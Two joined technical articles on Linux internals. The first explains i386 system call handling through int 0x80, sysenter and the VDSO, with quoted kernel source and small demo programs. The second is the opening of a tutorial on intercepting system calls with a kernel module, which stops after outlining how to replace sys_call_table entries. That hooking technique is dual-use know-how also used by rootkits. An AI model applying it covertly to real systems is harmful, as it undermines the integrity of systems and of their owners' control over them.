System calls in Linux

"The time has come," the Walrus said, "to talk of many things."
L. Carroll (quoted from B. Stroustrup's book)

Instead of an introduction.

So much has already been written and rewritten about the internals of the Linux kernel in general, and about its subsystems and system calls in particular. Probably every self-respecting author should write about this at least once, just as every self-respecting programmer must write his own file manager :) I am not a professional IT writer, and I take my notes mainly for myself, so as not to forget too quickly what I have learned. But if my travel notes turn out to be useful to someone, I will of course only be glad. And since you can't spoil porridge with butter, maybe I will even manage to describe something that no one else bothered to mention.

Theory. What are system calls?

When the uninitiated are told what software (or an OS) is, they usually hear something like this: the computer by itself is a piece of hardware, and software is what makes it possible to get some benefit out of that hardware. Crude, of course, but broadly true. I would say much the same about the OS and system calls. System calls can be implemented differently in different operating systems, and their number can differ, but in one form or another every OS has a system call mechanism. Every day a user works with files, explicitly or implicitly. He can explicitly open a file for editing in his favorite MS Word or Notepad, or he can simply launch a game whose executable image is also stored in a file, which in turn must be opened and read by the executable loader. The game itself may open and read dozens of files while it runs. Naturally, files can be written as well as read (not always, but we are not talking about access rights and discretionary access control here :)). All of this is managed by the kernel (in microkernel operating systems the situation may be different, but we will quietly lean towards the object of our discussion, Linux, and ignore this point). Spawning a new process is also a service provided by the OS kernel. All this is wonderful, as is the fact that modern processors run at gigahertz frequencies and consist of many millions of transistors, but what then?
If there were no mechanism by which user applications could perform fairly mundane but necessary things (strictly speaking, these trivial actions are always performed by the OS kernel, not by the user application - ed.), the OS would be a thing in itself, absolutely useless, or else each user application would have to become an operating system of its own in order to serve all its needs. Nice, isn't it?

Thus we arrive at a first approximation of the definition: a system call is a service that the OS kernel provides to a user application at the application's request. Such a service can be the already mentioned opening of a file, creating it, reading it, writing to it, creating a new process, getting the process identifier (pid), mounting a file system and, finally, shutting down the system. In real life there are many more system calls than are listed here.

What does a system call look like, and what is it? From the above it is clear that a system call is a kernel subroutine with a prescribed form. Those who have programmed under Win9x/DOS will probably remember interrupt int 0x21 with all (or at least some) of its many functions. There is, however, one small quirk that applies to all Unix system calls. By convention, the function that implements a system call may take N arguments or none at all, but it must return an integer value. Any non-negative value is interpreted as successful execution of the system call function, and therefore of the system call itself. A value less than zero signals an error and at the same time carries the error code (error codes are defined in the headers include/asm-generic/errno-base.h and include/asm-generic/errno.h). In Linux the gateway for system calls was, until recently, interrupt int 0x80, while in Windows (up to XP Service Pack 2, if I am not mistaken) the gateway is interrupt 0x2e. In the Linux kernel, again until recently, all system calls were handled by the system_call() function. As it turned out later, however, the classic mechanism of processing system calls through gate 0x80 causes a significant performance drop on Intel Pentium 4 processors. The classic mechanism was therefore replaced by the method of virtual dynamic shared objects - VDSO (a DSO is a dynamic shared object file; I cannot vouch for the translation, but a DSO is what Windows users know as a DLL, a dynamically loaded and linked library). How does the new method differ from the classic one? First, let's look at the classic method, which works through gate 0x80.

The classic system call handling mechanism in Linux.

Interrupts in x86 architecture.

As mentioned above, gate 0x80 (int 0x80) used to serve the requests of user applications. A system based on the IA-32 architecture is driven by interrupts (strictly speaking, this applies to all x86-based systems). When an event occurs (a new timer tick, activity on some device, an error such as division by zero, and so on), an interrupt is generated. An interrupt is so named because it usually interrupts the normal flow of code. Interrupts are usually divided into hardware and software interrupts. Hardware interrupts are generated by system and peripheral devices. When a device needs the attention of the OS kernel, it raises a signal on its interrupt request line (IRQ - Interrupt ReQuest line). As a result, a corresponding signal appears on certain processor inputs, and on that basis the processor decides to interrupt the instruction stream and transfer control to the interrupt handler, which finds out what happened and what needs to be done. Hardware interrupts are asynchronous by nature, which means that an interrupt can occur at any time. Besides peripheral devices, the processor itself can generate interrupts (or, more precisely, hardware exceptions, for example the already mentioned division by zero). This is done to notify the OS of an abnormal situation so that the OS can take some action in response. After the interrupt has been processed, the processor returns to the interrupted program. An interrupt can also be initiated by a user application. Such an interrupt is called a software interrupt. Software interrupts, unlike hardware interrupts, are synchronous: when an interrupt is invoked, the code that invoked it is suspended until the interrupt has been serviced.
On exit from the interrupt handler, control returns to the far address saved on the stack earlier (when the interrupt was invoked), that is, to the instruction following the one that invoked the interrupt (int). An interrupt handler is a memory-resident piece of code. It is usually a small program, although in the Linux kernel an interrupt handler is not always that small. An interrupt handler is identified by a vector. A vector is nothing more than the address (segment and offset) of the beginning of the code that should handle interrupts with the given index. Working with interrupts differs significantly between the processor's Real Mode and Protected Mode (let me remind you that here and below we mean Intel processors and compatible ones). In real (unprotected) mode, interrupt handlers are identified by their vectors, which are always stored at the very beginning of memory; the desired address is fetched from the vector table by an index, which is also the interrupt number. By overwriting the vector with a certain index, you can assign your own handler to the interrupt.

In protected mode, interrupt handlers (gates) are no longer identified through a vector table. Instead of that table, a gate table or, more correctly, an interrupt descriptor table - IDT (Interrupt Descriptor Table) - is used. This table is built by the kernel, and its address is stored in the processor's idtr register. This register is not directly accessible; it can only be worked with through the lidt / sidt instructions. The first of them (lidt) loads into idtr the value given in its operand, which is the base address of the interrupt descriptor table; the second (sidt) stores the table address held in idtr into the given operand. The descriptor of the segment that services an interrupt is selected in protected mode in the same way as segment information is selected from a descriptor table by a selector. Intel processors have supported memory protection since the i80286 (not quite in its present form, if only because the 286 was a 16-bit processor, which is why Linux cannot run on it) and the i80386. The processor performs all the necessary lookups by itself, so we will not go deep into all the subtleties of protected mode (and Linux does work in protected mode). Unfortunately, neither time nor space allows us to dwell on interrupt handling in protected mode for long, and that was not the goal of this article anyway. All the information given here about the x86 family of processors is rather superficial and is provided only to help you understand the kernel's system call mechanism a little better. Some things can be learned directly from the kernel code, although for a complete understanding of what is going on it is still advisable to become familiar with the principles of protected mode. The piece of code that fills the IDT with initial values (but does not load it!) is in arch/i386/kernel/head.S:

    /*
     * setup_idt
     *
     * sets up a idt with 256 entries pointing to
     * ignore_int, interrupt gates. It doesn't actually load
     * idt - that can be done only after paging has been enabled
     * and the kernel moved to PAGE_OFFSET. Interrupts
     * are enabled elsewhere, when we can be relatively
     * sure everything is ok.
     *
     * Warning: %esi is live across this function.
     */
     1. setup_idt:
     2.     lea ignore_int,%edx
     3.     movl $(__KERNEL_CS << 16),%eax
     4.     movw %dx,%ax            /* selector = 0x0010 = cs */
     5.     movw $0x8E00,%dx        /* interrupt gate - dpl=0, present */
     6.     lea idt_table,%edi
     7.     mov $256,%ecx
     8. rp_sidt:
     9.     movl %eax,(%edi)
    10.     movl %edx,4(%edi)
    11.     addl $8,%edi
    12.     dec %ecx
    13.     jne rp_sidt
    14. .macro set_early_handler handler,trapno
    15.     lea \handler,%edx
    16.     movl $(__KERNEL_CS << 16),%eax
    17.     movw %dx,%ax
    18.     movw $0x8E00,%dx        /* interrupt gate - dpl=0, present */
    19.     lea idt_table,%edi
    20.     movl %eax,8*\trapno(%edi)
    21.     movl %edx,8*\trapno+4(%edi)
    22. .endm
    23.     set_early_handler handler=early_divide_err,trapno=0
    24.     set_early_handler handler=early_illegal_opcode,trapno=6
    25.     set_early_handler handler=early_protection_fault,trapno=13
    26.     set_early_handler handler=early_page_fault,trapno=14
    28.     ret

A few notes on the code: it is written in AT&T assembler syntax, so your knowledge of assembler in the usual Intel notation may only confuse you. The most basic difference is the order of the operands. Intel notation uses the order "destination <- source", whereas AT&T assembler uses the direct order, "source -> destination". Processor registers must, as a rule, carry the prefix "%", and immediate values (constants) are prefixed with the dollar sign "$". AT&T syntax is traditionally used on Un*x systems.

In the above example, lines 2-4 set the address of the default handler for all interrupts. The default handler is ignore_int, which does nothing. Such a stub is needed so that all interrupts are processed correctly at this stage, since there are simply no other handlers yet (traps are, however, set a little further down in the code; for traps see the Intel architecture manuals or a similar reference, we will not touch on them here). Line 5 sets the gate type. On line 6 we load the address of our IDT into the index register %edi. The table contains 256 entries of 8 bytes each. In lines 8-13 we fill the entire table with the same values prepared earlier in the eax and edx registers, that is, with an interrupt gate that refers to the ignore_int handler. Below that, in lines 14-22, we define a macro for setting traps. In lines 23-26 we use this macro to set traps for the following exceptions: early_divide_err - division by zero (0), early_illegal_opcode - unknown processor instruction (6), early_protection_fault - memory protection fault (13), early_page_fault - page translation fault (14). The numbers in parentheses are the numbers of the "interrupts" generated when the corresponding abnormal situation occurs. Before the processor type is checked in arch/i386/kernel/head.S, the IDT is filled in by a call to setup_idt:

    /*
     * start system 32-bit setup. We need to re-do some of the things done
     * in 16-bit mode for the "real" operations.
     */
    1.     call setup_idt
           ...
    2.     call check_x87
    3.     lgdt early_gdt_descr
    4.     lidt idt_descr

After the type of the (co)processor has been determined and all the preparatory steps have been performed, lines 3 and 4 load the GDT and IDT that will be used during the very first stages of kernel operation.

System calls and int 0x80.

Let's go back from interrupts to system calls. So what does it take to service a process that requests a service? First, we need to move from ring 3 (privilege level CPL = 3) to the most privileged level 0 (Ring 0, CPL = 0), because the kernel code resides in the segment with the highest privileges. In addition, handler code is needed to service the process. This is exactly what gate 0x80 is used for. Although there are quite a few system calls, they all use a single entry point - int 0x80. The handler itself is installed by the function arch/i386/kernel/traps.c::trap_init():

    void __init trap_init(void)
    {
        ...
        set_system_gate(SYSCALL_VECTOR, &system_call);
        ...
    }

This line is what interests us most in trap_init(). Higher up in the same file you can look at the code of the set_system_gate() function:

    static void __init set_system_gate(unsigned int n, void *addr)
    {
        _set_gate(n, DESCTYPE_TRAP | DESCTYPE_DPL3, addr, __KERNEL_CS);
    }

Here you can see that the gate for interrupt 0x80 (this is the value defined by the SYSCALL_VECTOR macro, you can take my word for it :)) is set up as a trap with privilege level DPL = 3 (Ring 3), i.e. this interrupt may be invoked from user space. The problem of moving from Ring 3 to Ring 0 is thereby solved. The _set_gate() function is defined in the header file include/asm-i386/desc.h. For the especially curious, the code is given below, though without lengthy explanations:

    static inline void _set_gate(int gate, unsigned int type, void *addr, unsigned short seg)
    {
        __u32 a, b;
        pack_gate(&a, &b, (unsigned long)addr, seg, type, 0);
        write_idt_entry(idt_table, gate, a, b);
    }

Let's go back to the trap_init() function. It is called from the start_kernel() function in init/main.c. If you look at the trap_init() code, you can see that this function rewrites some of the IDT entries: the handlers that were used in the early stages of kernel initialization (early_page_fault, early_divide_err, early_illegal_opcode, early_protection_fault) are replaced with the ones that will be used during normal kernel operation. So we have almost reached the point, and we already know that all system calls are processed in the same way, through the int 0x80 gate. The system_call() function is installed as the handler for int 0x80, as can be seen from the above fragment of arch/i386/kernel/traps.c::trap_init().

system_call ().

The system_call() function code is located in arch/i386/kernel/entry.S and looks like this:

        # system call handler stub
    ENTRY(system_call)
        RING0_INT_FRAME                 # can't unwind into user space anyway
        pushl %eax                      # save orig_eax
        CFI_ADJUST_CFA_OFFSET 4
        SAVE_ALL
        GET_THREAD_INFO(%ebp)
                                        # system call tracing in operation / emulation
        /* Note, _TIF_SECCOMP is bit number 8, and so it needs testw and not testb */
        testw $(_TIF_SYSCALL_EMU|_TIF_SYSCALL_TRACE|_TIF_SECCOMP|_TIF_SYSCALL_AUDIT),TI_flags(%ebp)
        jnz syscall_trace_entry
        cmpl $(nr_syscalls), %eax
        jae syscall_badsys
    syscall_call:
        call *sys_call_table(,%eax,4)
        movl %eax,PT_EAX(%esp)          # store the return value
        ...

The code is not shown in full. As you can see, system_call() first sets up the stack for work in ring 0, saves the value passed in eax on the stack, saves all registers on the stack as well, obtains the data about the calling thread, and checks whether the passed value, the system call number, is outside the bounds of the system call table. Finally, using the value passed in eax as an index, system_call() jumps to the actual system call handler, the one referenced by the corresponding table entry. Now remember the good old real-mode interrupt vector table. Doesn't this remind you of something? In reality, of course, everything is somewhat more complicated. In particular, the system call must copy the results from the kernel stack to the user stack, pass the return code, and do a few other things. If the argument given in eax does not refer to an existing system call (the value is out of range), a jump to the syscall_badsys label occurs. There the value -ENOSYS (system call not implemented) is stored on the stack at the offset where the eax value should be. This completes the execution of system_call().

The system call table is located in the file arch/i386/kernel/syscall_table.S and has a fairly simple form:

    ENTRY(sys_call_table)
        .long sys_restart_syscall   /* 0 - old "setup()" system call, used for restarting */
        .long sys_exit
        .long sys_fork
        .long sys_read
        .long sys_write
        .long sys_open              /* 5 */
        .long sys_close
        .long sys_waitpid
        .long sys_creat
        ...

In other words, the entire table is nothing more than an array of function addresses, arranged in the order of the system call numbers that these functions serve. The table is an ordinary array of double words (or 32-bit words, whichever you prefer). The code of some of the functions that serve system calls is in the platform-dependent part, arch/i386/kernel/sys_i386.c, while the platform-independent part is in kernel/sys.c.

That is how things stand with system calls and gate 0x80.

New mechanism for handling system calls in Linux. sysenter / sysexit.

As mentioned, it quickly became clear that the traditional way of handling system calls through gate 0x80 leads to a performance loss on Intel Pentium 4 processors. Linus Torvalds therefore implemented a new mechanism in the kernel, based on the sysenter / sysexit instructions, to improve kernel performance on machines with a Pentium II processor or later (Intel processors support the sysenter / sysexit instructions starting with the Pentium II). What is the essence of the new mechanism? Oddly enough, the essence remains the same; only the execution has changed. According to Intel documentation, the sysenter instruction is part of the "fast system call" mechanism. The instruction is optimized for a quick transition from one privilege level to another; more precisely, it speeds up the transition to ring 0 (Ring 0, CPL = 0). The operating system must prepare the processor for the use of sysenter. This setup is performed once, when the OS kernel is loaded and initialized. When sysenter is executed, it sets the processor registers according to the model-specific registers (MSRs) previously programmed by the OS. In particular, it sets the code segment register and the instruction pointer, cs:eip, as well as the stack segment and the stack pointer, ss and esp. Execution moves to the new code segment and offset, and the privilege level changes from ring 3 to ring 0.

The sysexit instruction does the opposite. It makes a quick transition from privilege level 0 to level 3 (CPL = 3). The code segment register is set to 16 plus the cs value stored in the processor's model-specific register. The eip register receives the contents of the edx register. The ss register receives the sum of 24 and the same cs value, the one the OS wrote into the model-specific register when it prepared the context for the sysenter instruction. The esp register receives the contents of the ecx register. The values required by the sysenter / sysexit instructions are stored at the following addresses:

SYSENTER_CS_MSR 0x174 - the code segment: holds the selector of the segment that contains the system call handler code.
SYSENTER_ESP_MSR 0x175 - the pointer to the top of the stack for the system call handler.
SYSENTER_EIP_MSR 0x176 - the offset within the code segment: points to the start of the system call handler code.

The addresses 0x174-0x176 refer to model-specific registers (MSRs) that have no names. Values are written to model-specific registers with the wrmsr instruction: edx:eax must contain the upper and lower halves of the 64-bit value, respectively, and ecx must contain the address of the register to be written. In Linux, the addresses of the model-specific registers are defined in the header file include/asm-i386/msr-index.h as follows (before version 2.6.22, at least, they were defined in the header file include/asm-i386/msr.h; let me remind you that we are examining the system call mechanism using the Linux 2.6.22 kernel as an example):

    #define MSR_IA32_SYSENTER_CS    0x00000174
    #define MSR_IA32_SYSENTER_ESP   0x00000175
    #define MSR_IA32_SYSENTER_EIP   0x00000176

The kernel code responsible for setting the model-specific registers is located in arch/i386/kernel/sysenter.c and looks like this:

    void enable_sep_cpu(void)
    {
        int cpu = get_cpu();
        struct tss_struct *tss = &per_cpu(init_tss, cpu);

        if (!boot_cpu_has(X86_FEATURE_SEP)) {
            put_cpu();
            return;
        }

        tss->x86_tss.ss1 = __KERNEL_CS;
        tss->x86_tss.esp1 = sizeof(struct tss_struct) + (unsigned long) tss;
        wrmsr(MSR_IA32_SYSENTER_CS, __KERNEL_CS, 0);
        wrmsr(MSR_IA32_SYSENTER_ESP, tss->x86_tss.esp1, 0);
        wrmsr(MSR_IA32_SYSENTER_EIP, (unsigned long) sysenter_entry, 0);
        put_cpu();
    }

Here the tss variable receives the address of the structure that describes the task state segment. The TSS (Task State Segment) describes the context of a task and is part of the hardware multitasking mechanism of the x86 architecture. Linux, however, makes practically no use of hardware task switching. According to Intel documentation, a switch to another task is performed by executing an intersegment jump instruction (jmp or call) that refers either to a TSS segment or to a task gate descriptor in the GDT (LDT). A special processor register invisible to the programmer, TR (Task Register), contains the task descriptor selector. Loading this register also loads the program-invisible base and limit registers associated with TR.

Although Linux does not use hardware task switching, the kernel is forced to set aside a TSS entry for each processor installed in the system. This is because when the processor switches from user mode to kernel mode, it fetches the kernel stack address from the TSS. In addition, the TSS is required for controlling access to I/O ports: it contains a map of port access rights. Based on this map, the port access of each process that uses the in / out instructions can be controlled. Here tss->x86_tss.esp1 points to the kernel stack, and __KERNEL_CS naturally points to the kernel code segment. The address of the sysenter_entry() function is specified as the offset (eip).

The sysenter_entry() function is defined in arch/i386/kernel/entry.S and looks like this:

    /* SYSENTER_RETURN points to after the "sysenter" instruction in
       the vsyscall page. See vsyscall-sysentry.S, which defines the symbol. */

        # sysenter call handler stub
    ENTRY(sysenter_entry)
        CFI_STARTPROC simple
        CFI_SIGNAL_FRAME
        CFI_DEF_CFA esp, 0
        CFI_REGISTER esp, ebp
        movl TSS_sysenter_esp0(%esp),%esp
    sysenter_past_esp:
        /*
         * No need to follow this irqs on/off section: the syscall
         * disabled irqs and here we enable it straight after entry:
         */
        ENABLE_INTERRUPTS(CLBR_NONE)
        pushl $(__USER_DS)
        CFI_ADJUST_CFA_OFFSET 4
        /*CFI_REL_OFFSET ss, 0*/
        pushl %ebp
        CFI_ADJUST_CFA_OFFSET 4
        CFI_REL_OFFSET esp, 0
        pushfl
        CFI_ADJUST_CFA_OFFSET 4
        pushl $(__USER_CS)
        CFI_ADJUST_CFA_OFFSET 4
        /*CFI_REL_OFFSET cs, 0*/
        /*
         * Push current_thread_info()->sysenter_return to the stack.
         * A tiny bit of offset fixup is necessary - 4*4 means the 4 words
         * pushed above; +8 corresponds to copy_thread's esp0 setting.
         */
        pushl (TI_sysenter_return-THREAD_SIZE+8+4*4)(%esp)
        CFI_ADJUST_CFA_OFFSET 4
        CFI_REL_OFFSET eip, 0

    /*
     * Load the potential sixth argument from user stack.
     * Careful about security.
     */
        cmpl $__PAGE_OFFSET-3,%ebp
        jae syscall_fault
    1:  movl (%ebp),%ebp
    .section __ex_table,"a"
        .align 4
        .long 1b,syscall_fault
    .previous

        pushl %eax
        CFI_ADJUST_CFA_OFFSET 4
        SAVE_ALL
        GET_THREAD_INFO(%ebp)

        /* Note, _TIF_SECCOMP is bit number 8, and so it needs testw and not testb */
        testw $(_TIF_SYSCALL_EMU|_TIF_SYSCALL_TRACE|_TIF_SECCOMP|_TIF_SYSCALL_AUDIT),TI_flags(%ebp)
        jnz syscall_trace_entry
        cmpl $(nr_syscalls), %eax
        jae syscall_badsys
        call *sys_call_table(,%eax,4)
        movl %eax,PT_EAX(%esp)
        DISABLE_INTERRUPTS(CLBR_ANY)
        TRACE_IRQS_OFF
        movl TI_flags(%ebp), %ecx
        testw $_TIF_ALLWORK_MASK, %cx
        jne syscall_exit_work
    /* if something modifies registers it must also disable sysexit */
        movl PT_EIP(%esp), %edx
        movl PT_OLDESP(%esp), %ecx
        xorl %ebp,%ebp
        TRACE_IRQS_ON
    1:  mov PT_FS(%esp), %fs
        ENABLE_INTERRUPTS_SYSEXIT
        CFI_ENDPROC
    .pushsection .fixup,"ax"
    2:  movl $0,PT_FS(%esp)
        jmp 1b
    .section __ex_table,"a"
        .align 4
        .long 1b,2b
    .popsection
    ENDPROC(sysenter_entry)

As with system_call(), most of the work is done in the line call *sys_call_table(,%eax,4). This is where the specific system call handler is invoked. So it is clear that little has changed fundamentally. The fact that the interrupt vector is now wired into the hardware, and that the processor helps us move from one privilege level to another faster, changes only some details of the execution while the content stays the same. However, the changes do not end there. Remember where the story began: at the very beginning I mentioned virtual shared objects. Previously, a system call made from, say, the system library libc looked like an interrupt invocation (even though the library took over some functions to reduce the number of context switches). Now, thanks to the VDSO, a system call can be made almost directly, without libc. It could have been made directly before as well, again as an interrupt. But now the call can be requested like an ordinary function exported from a dynamically linked library (DSO). At boot time the kernel determines which mechanism should and can be used on the given platform. Depending on the circumstances, the kernel sets the entry point of the function that makes the system call. The function is then exported to user space in the form of the linux-gate.so.1 library. The linux-gate.so.1 library does not physically exist on disk. It is, so to speak, emulated by the kernel and exists exactly as long as the system is running. If you shut the system down and mount its root file system from another system, you will not find this file on the root file system of the stopped system. In fact, you will not find it on a running system either. Physically, it simply does not exist. That is why linux-gate.so.1 is nothing other than a VDSO, i.e. a Virtual Dynamically Shared Object. The kernel maps this emulated dynamic library into the address space of every process.
You can easily verify this by running the following command:

    $ cat /proc/self/maps
    08048000-0804c000 r-xp 00000000 08:01 46 /bin/cat
    0804c000-0804d000 rw-p 00003000 08:01 46 /bin/cat
    0804d000-0806e000 rw-p 0804d000 00:00 0
    ...
    b7fdf000-b7fe1000 rw-p 00019000 08:01 2066 /lib/ld-2.5.so
    bffd2000-bffe8000 rw-p bffd2000 00:00 0
    ffffe000-fffff000 r-xp 00000000 00:00 0

Here the very last line is the object we are interested in:

    ffffe000-fffff000 r-xp 00000000 00:00 0

The example shows that the object occupies exactly one page of memory, 4096 bytes, practically at the very edge of the address space. Let's do one more experiment:

    $ ldd `which cat`
        linux-gate.so.1 => (0xffffe000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e87000)
        /lib/ld-linux.so.2 (0xb7fdf000)
    $ ldd `which gcc`
        linux-gate.so.1 => (0xffffe000)
        libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e3c000)
        /lib/ld-linux.so.2 (0xb7f94000)
    $

Here we simply took two applications at random. It can be seen that the library is mapped into the process address space at the same constant address, 0xffffe000. Now let's try to see what is actually stored on this memory page ...

You can dump the memory page where the shared VDSO code is stored using the following program:

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main()
    {
        /* address of the VDSO page as seen in the maps output */
        char *vdso = (char *)0xffffe000;
        char *buffer;
        FILE *f;

        buffer = malloc(4096);
        if (!buffer)
            exit(1);

        memcpy(buffer, vdso, 4096);

        if (!(f = fopen("test.dump", "w+b"))) {
            free(buffer);
            exit(1);
        }

        fwrite(buffer, 4096, 1, f);
        fclose(f);
        free(buffer);

        return 0;
    }

Strictly speaking, this used to be easier to do with the command dd if=/proc/self/mem of=test.dump bs=4096 skip=1048574 count=1, but kernels since version 2.6.22, or perhaps even earlier, no longer map process memory to /proc/`pid`/mem. The file has been kept, apparently for compatibility, but it no longer provides this information.

Let's compile and run the given program, and then try to disassemble the resulting dump:

    $ objdump --disassemble ./test.dump

    ./test.dump:     file format elf32-i386

    Disassembly of section .text:

    ffffe400 <__kernel_vsyscall>:
    ffffe400:   51          push %ecx
    ffffe401:   52          push %edx
    ffffe402:   55          push %ebp
    ffffe403:   89 e5       mov %esp,%ebp
    ffffe405:   0f 34       sysenter
    ...
    ffffe40e:   eb f3       jmp ffffe403 <__kernel_vsyscall+0x3>
    ffffe410:   5d          pop %ebp
    ffffe411:   5a          pop %edx
    ffffe412:   59          pop %ecx
    ffffe413:   c3          ret
    ...
    $

Here it is, our gateway for system calls, in plain view. A process (or the system library libc) that calls the __kernel_vsyscall function arrives at address 0xffffe400 (in our case). Next, __kernel_vsyscall saves the contents of the ecx, edx and ebp registers on the stack of the user process. We have already discussed the purpose of the ecx and edx registers; ebp is used later to restore the user stack. Then the sysenter instruction is executed, which "intercepts" control much as an interrupt would and, as a consequence, transfers it to sysenter_entry (see above). The jmp instruction at 0xffffe40e is there to restart a system call with 6 arguments (see http://lkml.org/lkml/2002/12/18/). The code placed on this page is located in arch/i386/kernel/vsyscall-sysenter.S (or arch/i386/kernel/vsyscall-int80.S for the 0x80 trap). Although I found the address of the __kernel_vsyscall function to be constant, it is said that this is not necessarily so. Normally the position of the entry point to __kernel_vsyscall() should be obtained from the ELF auxiliary vector (auxv) through the AT_SYSINFO entry. The ELF auxiliary vector holds information that is passed to the process on the stack at startup and is needed during the program's execution. The same area of the initial stack also carries the process's arguments, environment variables, and so on.

Here is a small C example of how to call the __kernel_vsyscall function directly:

#include <stdio.h>

int pid;

int main()
{
    __asm(
        "movl $20, %eax \n"
        "call *%gs:0x10 \n"
        "movl %eax, pid \n"
    );
    printf("pid: %d\n", pid);
    return 0;
}

This example is taken from Manu Garg's page, http://www.manugarg.com. In it we make the getpid() system call (number 20, otherwise known as __NR_getpid). In order not to dig through the process stack looking for AT_SYSINFO, we take advantage of the fact that the libc.so system library copies the value of AT_SYSINFO into the Thread Control Block (TCB) at load time. This block is usually referenced through the selector in gs. We assume that the value we need sits at offset 0x10 and make a call to the address stored at %gs:0x10.
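If you would rather not rely on the TCB offset, the auxv entries can also be read through the C library. Below is a minimal sketch, assuming glibc 2.16 or later, where getauxval() from <sys/auxv.h> is available. The helper names auxv_entry and print_vsyscall_info are mine, not part of any library. On some platforms (64-bit ones in particular) AT_SYSINFO may simply read as 0, so treat the output as informational.

```c
#include <elf.h>        /* AT_SYSINFO, AT_SYSINFO_EHDR, AT_PAGESZ */
#include <stdio.h>
#include <sys/auxv.h>   /* getauxval(), assumed glibc 2.16 or later */

/* Hypothetical helper: return one auxv entry, or 0 if it is absent. */
unsigned long auxv_entry(unsigned long type)
{
    return getauxval(type);
}

/* Hypothetical helper: print the entries related to the syscall gateway. */
void print_vsyscall_info(void)
{
    printf("AT_SYSINFO      = %#lx\n", auxv_entry(AT_SYSINFO));
    printf("AT_SYSINFO_EHDR = %#lx\n", auxv_entry(AT_SYSINFO_EHDR));
    printf("AT_PAGESZ       = %lu\n", auxv_entry(AT_PAGESZ));
}
```

Calling print_vsyscall_info() from main() prints the three values for the current process.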

Results.

In practice, support for the FSCF (Fast System Call Facility) on a platform does not always bring a noticeable performance gain. The problem is that, one way or another, a process rarely talks to the kernel directly, and there are good reasons for this. Using the libc library guarantees the portability of a program regardless of the kernel version, and it is through the standard system library that most system calls go. Even if you build and install the latest kernel for a platform that supports FSCF, a performance gain is not guaranteed: your libc.so system library will keep using int 0x80, and the only remedy is to rebuild glibc. Whether glibc supports the VDSO interface and __kernel_vsyscall at all, I honestly cannot say at the moment.

Links.

Manu Garg's page, http://www.manugarg.com
Scatter/Gather thoughts by Johan Petersson, http://www.trilithium.com/johan/2005/08/linux-gate/
The good old "Understanding the Linux Kernel". Where would we be without it :)
And, of course, the Linux source code (2.6.22)

VLADIMIR MESHKOV

Intercepting system calls in Linux

In recent years, the Linux operating system has firmly established itself as the leading server platform, ahead of many commercial products. Still, the protection of information systems built on this OS remains a pressing issue. There are many technical means, both software and hardware, for securing a system: encryption of data and network traffic, access control for information resources, protection of email and web servers, antivirus protection, and so on. The list, as you know, is quite long. In this article, we look at a protection mechanism based on intercepting the system calls of the Linux operating system. This mechanism lets you take control of any application and thereby prevent destructive actions it might perform.

System calls

Let's start with a definition. System calls are a set of functions implemented in the OS kernel. Any request from a user application is ultimately turned into a system call that performs the requested action. A complete list of Linux system calls can be found in the /usr/include/asm/unistd.h file. Let's look at the general mechanism for making system calls using an example. Suppose the application's source code calls the creat() function to create a new file. When the compiler encounters this call, it converts it into assembly code that loads the system call number for this function and its parameters into the processor registers and then raises interrupt 0x80. The following values are loaded into the processor registers:

the EAX register gets the system call number. In our case, the system call number is 8 (see __NR_creat);
the EBX register gets the first parameter of the function (for creat, a pointer to a string containing the name of the file to be created);
the ECX register gets the second parameter (the file access rights).

The third parameter would be loaded into the EDX register; in this case we do not have one. To execute a system call, Linux uses the system_call function, which is defined in the /usr/src/linux/arch/i386/kernel/entry.S file. This function is the entry point for all system calls. The kernel responds to interrupt 0x80 by calling system_call, which is, in effect, the handler for interrupt 0x80.

To make sure we're on the right track, let's write a small test snippet in assembler. Here we will see what the creat () function becomes after compilation. Let's name the file test.S. Here is its content:

.globl _start

.text

_start:

Load the system call number into the EAX register:

movl $8, %eax

The EBX register takes the first parameter, a pointer to a string with the file name:

movl $filename, %ebx

The ECX register takes the second parameter, the access rights:

movl $0, %ecx

Call the interrupt:

int $0x80

Exit the program. To do this, call exit(0):

movl $1, %eax
movl $0, %ebx
int $0x80

In the data segment, specify the name of the file to be created:

.data

filename: .string "file.txt"

Compile:

gcc -c test.S

ld -s -o test test.o

The executable file test will appear in the current directory. Running it creates a new file called file.txt.

Now let's get back to the system call mechanism. So, the kernel calls the handler for interrupt 0x80, the system_call function. system_call pushes copies of the registers holding the call parameters onto the stack using the SAVE_ALL macro and invokes the required system function with a call instruction. The table of pointers to the kernel functions that implement system calls lives in the sys_call_table array (see the file arch/i386/kernel/entry.S). The system call number held in the EAX register is an index into this array. Thus, if EAX contains 8, the kernel function sys_creat() will be called. Why is the SAVE_ALL macro needed? The explanation is simple. Since almost all kernel system functions are written in C, they look for their parameters on the stack, and it is SAVE_ALL that puts the parameters there. The value returned by the system call is stored in the EAX register.
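The same "number plus arguments" convention can be tried from C without writing assembler. Here is a minimal sketch that uses the syscall() wrapper from libc; I picked getpid rather than creat because it has no side effects and no arguments. The helper name raw_getpid is my own.

```c
#include <sys/syscall.h>  /* SYS_getpid */
#include <unistd.h>       /* syscall(), getpid() */

/* Hypothetical helper: issue getpid by its number instead of by name.
 * The kernel uses the number as an index into its call table and
 * hands the result back as the return value. */
long raw_getpid(void)
{
    return syscall(SYS_getpid);
}
```

The value returned should be the same one the ordinary getpid() wrapper reports.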

Now let's figure out how to intercept the system call. The mechanism of loadable kernel modules will help us with this. Although we have previously discussed the development and use of kernel modules, in the interests of consistency, we will briefly discuss what a kernel module is, what it consists of, and how it interacts with the system.

Loadable kernel module

A loadable kernel module (let's call it LKM, Loadable Kernel Module) is program code that runs in kernel space. The main feature of an LKM is that it can be loaded and unloaded dynamically, without rebooting the system or recompiling the kernel.

Each LKM consists of at least two main functions:

the module initialization function, called when the LKM is loaded into memory:

int init_module(void) { ... }

the module unload function:

void cleanup_module(void) { ... }

Let's give an example of the simplest module:

#define MODULE

#include <linux/module.h>

int init_module(void)
{
    printk("Hello World");
    return 0;
}

void cleanup_module(void)
{
    printk("Bye");
}

Compile and load the module. The module is loaded into memory by the insmod command:

gcc -c -O3 helloworld.c

insmod helloworld.o

Information about all modules currently loaded into the system is kept in the /proc/modules file. To make sure the module is loaded, enter cat /proc/modules or lsmod. The rmmod command unloads the module:

rmmod helloworld

System call interception algorithm

To implement a module that intercepts a system call, it is necessary to define an interception algorithm. The algorithm is as follows:

save a pointer to the original call so that it can be restored later;
create a function that implements the new system call;
replace the call in the sys_call_table system call table, i.e. point the corresponding entry at the new system call;
